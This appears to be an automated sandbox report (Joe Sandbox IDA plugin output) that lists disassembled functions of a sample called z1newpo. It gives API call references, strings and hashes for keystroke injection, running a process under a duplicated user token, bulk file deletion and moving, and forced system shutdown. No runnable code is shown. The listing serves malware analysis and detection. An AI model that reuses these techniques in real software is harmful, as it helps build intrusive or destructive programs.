                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 3100379633-4164748364
                                                    • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                    • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                    • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                    • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                    Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00434420
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                    • IsIconic.USER32(?), ref: 0043444F
                                                    • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                    • SetForegroundWindow.USER32(?), ref: 0043446A
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                    • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                    • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                    • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                    • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                    • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                    • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                    • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                    • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 2889586943-2988720461
                                                    • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                    • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                    • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                    • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                    Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                    • CloseHandle.KERNEL32(?), ref: 004463A0
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                    • GetProcessWindowStation.USER32 ref: 004463D1
                                                    • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                    • _wcslen.LIBCMT ref: 00446498
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _wcsncpy.LIBCMT ref: 004464C0
                                                    • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                    • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                    • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                    • CloseDesktop.USER32(?), ref: 0044657A
                                                    • SetProcessWindowStation.USER32(?), ref: 00446588
                                                    • CloseHandle.KERNEL32(?), ref: 00446592
                                                    • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                    • String ID: $@OH$default$winsta0
                                                    • API String ID: 3324942560-3791954436
                                                    • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                    • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                    • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                    • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                    Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                      • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                      • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                      • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • _wcscat.LIBCMT ref: 0044BD94
                                                    • _wcscat.LIBCMT ref: 0044BDBD
                                                    • __wsplitpath.LIBCMT ref: 0044BDEA
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                    • _wcscpy.LIBCMT ref: 0044BE71
                                                    • _wcscat.LIBCMT ref: 0044BE83
                                                    • _wcscat.LIBCMT ref: 0044BE95
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                    • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                    • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                    • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                    • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 2188072990-1173974218
                                                    • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                    • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                    • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                    • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                    Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                    • FindClose.KERNEL32(00000000), ref: 00478924
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                    • __swprintf.LIBCMT ref: 004789D3
                                                    • __swprintf.LIBCMT ref: 00478A1D
                                                    • __swprintf.LIBCMT ref: 00478A4B
                                                    • __swprintf.LIBCMT ref: 00478A79
                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                    • __swprintf.LIBCMT ref: 00478AA7
                                                    • __swprintf.LIBCMT ref: 00478AD5
                                                    • __swprintf.LIBCMT ref: 00478B03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 999945258-2428617273
                                                    • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                    • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                    • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                    • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                    Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                    • __wsplitpath.LIBCMT ref: 00403492
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • _wcscpy.LIBCMT ref: 004034A7
                                                    • _wcscat.LIBCMT ref: 004034BC
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                    • _wcscpy.LIBCMT ref: 004035A0
                                                    • _wcslen.LIBCMT ref: 00403623
                                                    • _wcslen.LIBCMT ref: 0040367D
                                                    Strings
                                                    • _, xrefs: 0040371C
                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                    • Error opening the file, xrefs: 00428231
                                                    • Unterminated string, xrefs: 00428348
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                    • API String ID: 3393021363-188983378
                                                    • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                    • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                    • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                    • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                    Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                    • FindClose.KERNEL32(00000000), ref: 00431B20
                                                    • FindClose.KERNEL32(00000000), ref: 00431B34
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                    • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                    • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1409584000-438819550
                                                    • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                    • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                    • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                    • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                    Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                    • __swprintf.LIBCMT ref: 00431C2E
                                                    • _wcslen.LIBCMT ref: 00431C3A
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2192556992-3457252023
                                                    • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                    • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                    • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                    • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                    Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                    • __swprintf.LIBCMT ref: 004722B9
                                                    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                    • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                    • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                    • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                    • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                    • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                    • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FolderPath$LocalTime__swprintf
                                                    • String ID: %.3d
                                                    • API String ID: 3337348382-986655627
                                                    • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                    • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                    • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                    • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                    Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                    • FindClose.KERNEL32(00000000), ref: 0044291C
                                                    • FindClose.KERNEL32(00000000), ref: 00442930
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                    • FindClose.KERNEL32(00000000), ref: 004429D4
                                                      • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                    • FindClose.KERNEL32(00000000), ref: 004429E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 2640511053-438819550
                                                    • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                    • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                    • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                    • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                    Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                    • GetLastError.KERNEL32 ref: 00433414
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                    • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                    • String ID: SeShutdownPrivilege
                                                    • API String ID: 2938487562-3733053543
